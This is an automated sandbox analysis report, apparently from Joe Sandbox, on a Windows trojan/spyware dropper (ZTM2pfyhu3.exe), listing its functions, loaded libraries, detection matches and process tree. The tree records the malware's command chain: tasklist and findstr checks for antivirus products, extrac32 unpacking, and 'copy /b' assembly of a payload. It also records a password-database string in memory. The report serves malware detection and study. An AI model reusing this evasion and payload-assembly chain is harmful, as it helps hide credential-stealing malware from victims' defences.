Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0049C624	14_2_0049C624
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004BE87F	14_2_004BE87F
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0050C8A4	14_2_0050C8A4
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004F2A05	14_2_004F2A05
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004B6ADE	14_2_004B6ADE
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004E8BFF	14_2_004E8BFF
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_0049CD7A	14_2_0049CD7A
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004ACE10	14_2_004ACE10
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004B7159	14_2_004B7159
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00489240	14_2_00489240
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00515311	14_2_00515311
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004896E0	14_2_004896E0
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004A1704	14_2_004A1704
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004A1A76	14_2_004A1A76
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00489B60	14_2_00489B60
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004A7B8B	14_2_004A7B8B
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004A1D20	14_2_004A1D20
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004A7DBA	14_2_004A7DBA
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004A1FE7	14_2_004A1FE7

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\768400\Climb.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: String function: 0049FD52 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: String function: 004A0DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: String function: 004062CF appears 57 times

Source: ZTM2pfyhu3.exe, 00000000.00000002.2144782533.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs ZTM2pfyhu3.exe
Source: ZTM2pfyhu3.exe, 00000000.00000002.2142832246.00000000007B2000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameladdad.exe4 vs ZTM2pfyhu3.exe
Source: ZTM2pfyhu3.exe, 00000000.00000002.2156273439.0000000004F80000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameladdad.exe4 vs ZTM2pfyhu3.exe
Source: ZTM2pfyhu3.exe	Binary or memory string: OriginalFilenameladdad.exe4 vs ZTM2pfyhu3.exe

Source: ZTM2pfyhu3.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.ZTM2pfyhu3.exe.20000.0.unpack, type: UNPACKEDPE

Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector

Source: ZTM2pfyhu3.exe

Static PE information: Section: jbuwepie ZLIB complexity 0.9945153322055325

Source: Set-up.exe.0.dr

Binary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@28/23@10/3

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_004F41FA GetLastError,FormatMessageW,

14_2_004F41FA

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004E2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		14_2_004E2010
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_004E1A0B AdjustTokenPrivileges,CloseHandle,		14_2_004E1A0B

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

2_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_004EDD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

14_2_004EDD87

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 2_2_004024FB CoCreateInstance,

2_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_004F3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

14_2_004F3A0E

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZTM2pfyhu3.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:120:WilError_03

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe

File created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Jump to behavior

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Climb.com, 0000000E.00000003.2398377961.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2398505720.00000000042FF000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2371867905.00000000042EE000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2372055549.00000000041ED000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: ZTM2pfyhu3.exe

ReversingLabs: Detection: 34%

Source: ZTM2pfyhu3.exe	String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: ZTM2pfyhu3.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\ZTM2pfyhu3.exe "C:\Users\user\Desktop\ZTM2pfyhu3.exe"
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe"
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Reflect
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Reflect	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZTM2pfyhu3.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
